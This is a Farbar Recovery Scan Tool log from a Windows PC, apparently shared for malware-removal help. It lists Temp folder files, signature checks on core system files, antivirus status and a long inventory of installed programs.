Some content of TEMP:
====================
C:\Users\JP\AppData\Local\Temp\cabex.dll
C:\Users\JP\AppData\Local\Temp\VARemove.exe
C:\Users\JP\AppData\Local\Temp\VAUninstall.exe
C:\Users\JR\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 19:00

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by JP at 2014-10-20 09:10:19
Running from E:\
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus 2013 (Disabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus 2013 (Disabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 Sansa Media Converter (HKLM-x32\...\{FC053571-8507-44E4-8B6D-AACEAB8CA57C}) (Version: 1.0-B4.263 - )
 Update for Microsoft Office 2007 (KB2508958) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
57xx SteelVine (HKLM-x32\...\{2B25D1AE-F095-47C9-BDCC-80F998E0E17F}) (Version: 5.1.20 - Silicon Image)
7-Zip 4.65 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0465-000001000000}) (Version: 4.65.00.0 - Igor Pavlov)
Acrobat.com (HKLM-x32\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)
Acrobat.com (x32 Version: 2.0.0 - Adobe Systems Incorporated) Hidden
Activate Norton Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.1.20.0 - Symantec)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 2.6.0.19140 - Adobe Systems Incorporated) Hidden
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.5.23 - Adobe Systems Incorporated.)
Adobe Community Help (x32 Version: 3.5.23 - Adobe Systems Incorporated.) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Photoshop Elements 10 (HKLM-x32\...\Adobe Photoshop Elements 10) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Photoshop Elements 10 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Adobe Photoshop.com Inspiration Browser (HKLM-x32\...\PhotoshopdotcomInspirationBrowser.4C35C4D325D350FE0114230CBADCA2DDD0AC8D25.1) (Version: 3.07 - Adobe Systems Incorporated)
Adobe Photoshop.com Inspiration Browser (x32 Version: 3.07 - Adobe Systems Incorporated) Hidden
Adobe Reader XI (11.0.03) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.03 - Adobe Systems Incorporated)
AMD Accelerated Video Transcoding (Version: 2.00.0002 - Advanced Micro Devices, Inc.) Hidden
AMD Catalyst Install Manager (HKLM\...\{20384EBF-4F10-13F0-07C6-7A6C87FD83DF}) (Version: 8.0.903.0 - Advanced Micro Devices, Inc.)
AMD Catalyst Install Manager (HKLM\...\{C8807716-1F6F-5C43-3C32-7295A45CF060}) (Version: 8.0.911.0 - Advanced Micro Devices, Inc.)
AMD Drag and Drop Transcoding (Version: 2.00.0000 - Advanced Micro Devices, Inc.) Hidden
AMD Media Foundation Decoders (Version: 1.0.70405.2224 - Advanced Micro Devices, Inc.) Hidden
Any Video Converter 5.6.3 (HKLM-x32\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)
Apple Application Support (HKLM-x32\...\{3FA365DF-2D68-45ED-8F83-8C8A33E65143}) (Version: 1.1.0 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{6956856F-B6B3-4BE0-BA0B-8F495BE32033}) (Version: 2.1.1.116 - Apple Inc.)
AutoUpdate (HKLM-x32\...\{18D10072035C4515918F7E37EAFAACFC}) (Version: 1.0 - )
AVG 2013 (HKLM\...\AVG) (Version: 2013.0.3485 - AVG Technologies)
AVG 2013 (Version: 13.0.3485 - AVG Technologies) Hidden
AVG 2013 (Version: 13.0.4031 - AVG Technologies) Hidden
BC_VUP3 (HKLM-x32\...\{DD15A07D-C205-4948-BF90-6D3DD05CEA31}) (Version: 3.0.1 - Uniden)
BlackBerry Desktop Software 6.1 (HKLM-x32\...\BlackBerry_Desktop) (Version: 6.1.0.36 - Research In Motion Ltd.)
BlackBerry Desktop Software 6.1 (x32 Version: 6.1.0.36 - Research In Motion Ltd.) Hidden
Canon Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version:  - )
Canon Easy-PhotoPrint Pro - Pro9000 series Extention Data (HKLM-x32\...\Canon Easy-PhotoPrint Pro - Pro9000 series Extention Data) (Version:  - )
Canon Easy-PhotoPrint Pro - Pro9500 series Extention Data (HKLM-x32\...\Canon Easy-PhotoPrint Pro - Pro9500 series Extention Data) (Version:  - )
Canon Easy-PhotoPrint Pro (HKLM-x32\...\Easy-PhotoPrint Pro) (Version:  - )
Canon MG8200 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG8200_series) (Version:  - Canon Inc.)
Canon MG8200 series User Registration (HKLM-x32\...\Canon MG8200 series User Registration) (Version:  - )
Canon MP Navigator EX 5.0 (HKLM-x32\...\MP Navigator EX 5.0) (Version:  - )
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version:  - )
Canon RAW Image Task for ZoomBrowser EX (HKLM-x32\...\RAW Image Task) (Version: 3.3.0.5 - Canon Inc.)
Canon Solution Menu EX (HKLM-x32\...\CanonSolutionMenuEX) (Version:  - )
Canon Utilities CameraWindow (HKLM-x32\...\CameraWindowLauncher) (Version: 7.1.0.2 - Canon Inc.)
Canon Utilities CameraWindow DC_DV 6 for ZoomBrowser EX (HKLM-x32\...\CameraWindowDVC6) (Version: 6.4.2.16 - Canon Inc.)
Canon Utilities Digital Photo Professional 3.4 (HKLM-x32\...\DPP) (Version: 3.4.0.0 - Canon Inc.)
Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.4.0.1 - Canon Inc.)
Canon Utilities MyCamera (HKLM-x32\...\MyCamera) (Version: 6.4.0.5 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.21.45 - Canon Inc.)
Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.3.0.0 - Canon Inc.)
Canon Utilities RemoteCapture Task for ZoomBrowser EX (HKLM-x32\...\RemoteCaptureTask) (Version: 1.7.1.9 - Canon Inc.)
Canon Utilities WFT-E1/E2/E3 Utility (HKLM-x32\...\WFTK) (Version: 3.2.1.1 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.1.1.21 - Canon Inc.)
Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.1.0.8 - Canon Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center (x32 Version: 2012.0405.2205.37728 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2012.0405.2205.37728 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2012.0405.2205.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Standard (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Traditional (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Czech (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Danish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Dutch (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help English (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Finnish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help French (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help German (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Greek (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Hungarian (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Italian (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Japanese (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Korean (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Norwegian (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Polish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Portuguese (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Russian (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Spanish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Swedish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Thai (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Turkish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (Version: 2012.0405.2205.37728 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM-x32\...\CCleaner) (Version: 2.35 - Piriform)
Chinese Simplified Fonts Support For Adobe Reader 9 (HKLM-x32\...\{AC76BA86-7AD7-2447-0000-900000000003}) (Version: 9.0.0 - Adobe Systems Incorporated)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Content Manager (HKLM-x32\...\{B64BC516-2406-43AE-A21A-1E387A2343B1}) (Version: 2.70 - Magellan)
Core Temp version 0.99.7 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 0.99.7 - Arthur Liberman)
Creative 3DMIDI Player (HKLM-x32\...\3DMIDI) (Version: 1.11 - Creative Technology Limited)
Creative ALchemy (HKLM-x32\...\ALchemy) (Version: 1.41 - Creative Technology Limited)
Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Console Launcher (HKLM-x32\...\Console Launcher) (Version: 2.61 - Creative Technology Limited)
Creative Diagnostics (HKLM-x32\...\Diagnostics 4_5) (Version: 5.11 - Creative Technology Limited)
Creative Media Toolbox 6 (HKLM-x32\...\{F1A14CB2-A048-45A6-AFDA-3571296E1D76}) (Version: 6.02 - Creative Technology Limited)
Creative Media Toolbox 6 (Shared Components) (HKLM-x32\...\Uninstaller_B4736000_Creative Media Toolbox 6) (Version: 2.80.12 - Creative Labs)
Creative MediaSource 5 (HKLM-x32\...\{BEEFC4F8-2909-48B3-AFAA-55D3533FDEDD}) (Version: 5.26 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.40 - Creative Technology Limited)
Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.02 - Creative Technology Limited)
Creative WaveStudio 7 (HKLM-x32\...\WaveStudio 7) (Version: 7.14 - Creative Technology Limited)
DeLorme Street Atlas USA 2008 (HKLM-x32\...\{81D0EAC7-B352-4E71-B8A1-461E41029A2E}) (Version: 1.00.2008 - DeLorme Publishing, Inc.)
Desktop Icon Position Saver (64-bit) (HKLM-x32\...\dips64) (Version:  - )
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
DivX Player (HKLM-x32\...\{8ADFC4160D694100B5B8A22DE9DCABD9}) (Version: 2.5.5 - DivXNetworks, Inc.)
DivX Pro (HKLM-x32\...\{7B63B2922B174135AFC0E1377DD81EC2}) (Version: 5.2.1 - DivXNetworks, Inc.)
Dolby Digital Live Pack (HKLM-x32\...\Dolby Digital Live Pack) (Version: 3.00 - Creative Technology Limited)
Download Accelerator Plus (DAP) (HKLM-x32\...\Download Accelerator Plus (DAP)) (Version: 10060 (Build 2599) - Speedbit Ltd.)
DraftSight (HKLM-x32\...\{A7E24CE8-F9D0-408F-A37C-5BF0716D3E91}) (Version: 8.2.301 - Dassault Systemes)
DTS Connect Pack (HKLM-x32\...\DTS Connect Pack) (Version: 1.00 - Creative Technology Limited)
DVD Decrypter (Remove Only) (HKLM-x32\...\DVD Decrypter) (Version:  - )
DVD Shrink 3.2 (HKLM-x32\...\DVD Shrink_is1) (Version:  - DVD Shrink)
Elements 10 Organizer (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
FreeRIP v3.5 (HKLM-x32\...\{501451DE-5808-4599-B544-8BD0915B6B24}_is1) (Version: 3.5 - MGShareware)
FreeSCAN  (HKLM-x32\...\FreeSCAN) (Version:  - Sixspot Software)
GSurf_Pro (HKLM-x32\...\GSurf_Pro) (Version: 1.0.0.15 - Grandstream)
Hardware Diagnostic Tools (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5434.08 - PC-Doctor, Inc.)
HijackThis 2.0.2 (HKLM-x32\...\HijackThis) (Version: 2.0.2 - TrendMicro)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.12286.3436 - Hewlett-Packard)
HP Customer Experience Enhancements (x32 Version: 6.0.1.7 - Hewlett-Packard) Hidden
HP Easy Backup (HKLM-x32\...\{67431FA8-4B89-42DD-A68E-30D77F6C8D99}_is1) (Version: 1.0.8.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP MediaSmart Demo (HKLM-x32\...\{9DEF9686-CCB2-47B7-BF83-B49EA21FA016}) (Version: 1.00.0000 - Hewlett-Packard)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 3.0.3420 - Hewlett-Packard)
HP MediaSmart DVD (x32 Version: 3.0.3420 - Hewlett-Packard) Hidden
HP MediaSmart Movie Themes (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 3.0.3102 - Hewlett-Packard)
HP MediaSmart Movie Themes (x32 Version: 3.0.3102 - Hewlett-Packard) Hidden
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 3.1.3601 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (x32 Version: 3.1.3601 - Hewlett-Packard) Hidden
HP MediaSmart SmartMenu (HKLM\...\{26280024-DFB7-4967-90DB-7F9C6660D01E}) (Version: 3.0.28.2 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP)
HP Remote Solution (HKLM-x32\...\HP Remote Solution) (Version: 1.1.9.0 - TopSeed)
HP Remote Solution (x32 Version: 1.1.9.0 - TopSeed) Hidden
HP Setup (HKLM-x32\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Share-to-Web (HKLM-x32\...\{748F4870-8350-11D3-B0BF-080009FB4A19}) (Version:  - )
HP Support Information (HKLM-x32\...\{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}) (Version: 10.1.0002 - Hewlett-Packard)
HP Update (HKLM-x32\...\{2EFA4E4C-7B5F-48F7-A1C0-1AA882B7A9C3}) (Version: 5.003.001.001 - Hewlett-Packard)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Java 7 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.250 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.5 - Sun Microsystems, Inc.) Hidden
Juniper Networks Host Checker (HKCU\...\Neoteris_Host_Checker) (Version: 7.1.0.18193 - Juniper Networks)
Juniper Networks, Inc. Setup Client (HKCU\...\Juniper_Setup_Client) (Version: 7.1.2.10059 - Juniper Networks, Inc.)
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1901 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1901 - CyberLink Corp.) Hidden
LightScribe Diagnostic Utility (HKLM-x32\...\{7419582C-1E2E-4848-88F6-9FF638D9EA87}) (Version: 1.18.24.1 - LightScribe)
LightScribe System Software (HKLM-x32\...\{2FA75B40-17C9-4D22-88CA-80A5D52FAB13}) (Version: 1.18.24.1 - LightScribe)
LightScribe Template Designs - Life Events Pack 1 (HKLM-x32\...\{5B295E70-5256-46DD-ADA8-81E9EF7F4939}) (Version: 1.17.146.0 - LightScribe)
LightScribe Template Labeler (HKLM-x32\...\{83721450-E604-4C37-ABEB-CE7F18C587C8}) (Version: 1.18.24.1 - LightScribe)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (x32 Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft Live Search Toolbar (HKLM-x32\...\{DF802C05-4660-418c-970C-B988ADB1D316}) (Version: 3.0.560.0 - Microsoft Live Search Toolbar)
Microsoft Live Search Toolbar (x32 Version: 3.0.560.0 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access database engine 2007 (English) (HKLM-x32\...\{90120000-00D1-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20913.0 - Microsoft Corporation)
Microsoft Streets & Trips 2009 (HKLM-x32\...\{C82185E8-C27B-4EF4-2009-4444BC2C2B6D}) (Version: 16.0.18.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MiFi 4620 Mobile Broadband Drivers (HKLM-x32\...\{3A6120C6-AA5F-4851-9447-BF6BDBB786D5}) (Version: 2.08.005.001.17 - Novatel Wireless)
Monster Central Control Software 7 (HKLM-x32\...\{7649309B-F1ED-4225-8B50-1A4224883E55}) (Version: 7.2.0.6 - Monster)
Monster Central Control Software 7 (x32 Version: 7.2.0.6 - Monster) Hidden
MSVCRT (x32 Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyHarmony (HKCU\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nero OEM (HKLM-x32\...\Nero - Burning Rom!UninstallKey) (Version:  - )
NVIDIA Display Control Panel (HKLM\...\NVIDIA Display Control Panel) (Version: 6.14.12.5936 - NVIDIA Corporation)
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.10.62.40 - NVIDIA Corporation)
NVIDIA Performance (HKLM-x32\...\InstallShield_{7C7F30F4-94E7-4AA8-8941-90C4A80C68BF}) (Version: 6.5 - NVIDIA Corporation)
NVIDIA Performance (x32 Version: 6.5 - NVIDIA Corporation) Hidden
NVIDIA PhysX (HKLM-x32\...\{E10DB5DA-E576-40EA-A7FC-1CB2A7B283A6}) (Version: 9.09.1112 - NVIDIA Corporation)
NVMS7000 (HKLM-x32\...\{15174CE2-626C-4748-B2D2-E7B997E62745}) (Version: 2.00.00.50 - company)
OCX (HKLM-x32\...\OCX) (Version: 3.1.0.48 - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
PhotoNow! 1.0 (HKLM-x32\...\{D36DD326-7280-11D8-97C8-000129760CBE}) (Version:  - )
PictureMover (HKLM-x32\...\{1896E712-2B3D-45eb-BCE9-542742A51032}) (Version: 3.3.1.19 - Hewlett-Packard Company)
PL-2303 USB-to-Serial (HKLM-x32\...\{ECC3713C-08A4-40E3-95F1-7D0704F1CE5E}) (Version: 1.6.1 - Prolific Technology INC)
PowerRecover (x32 Version: 5.5.1931 - CyberLink Corp.) Hidden
PSE10 STI Installer (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
PVSonyDll (Version: 1.00.0001 - NVIDIA Corporation) Hidden
QuickTime (HKLM-x32\...\{216AB108-2AE1-4130-B3D5-20B2C4C80F8F}) (Version: 7.60.92.0 - Apple Inc.)
RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition (HKLM-x32\...\RivaTuner) (Version: v2.24 MSI Master Overclocking Arena 2009 edition - Alexey Nicolaychuk)
Sansa Updater (HKCU\...\Sansa Updater) (Version:  - )
Sony DVD Architect Studio 4.5 (HKLM-x32\...\{B7C7A59F-CF70-481E-A94F-7C2563AA5ADD}) (Version: 4.5.107 - Sony)
Sony Sound Forge Audio Studio 9.0 (HKLM-x32\...\{20207CCE-A8FA-44A7-AA3D-1E43EB307B27}) (Version: 9.0.232 - Sony)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM-x32\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Tera Term 4.75 (HKLM-x32\...\Tera Term_is1) (Version:  - )
